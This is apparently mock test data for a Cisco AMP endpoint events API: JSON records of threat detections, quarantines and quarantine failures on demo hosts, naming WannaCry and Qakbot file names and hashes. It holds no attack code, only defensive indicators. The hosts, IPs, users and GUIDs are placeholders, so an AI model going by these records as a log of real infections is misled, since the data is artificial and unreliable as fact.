Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":111000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
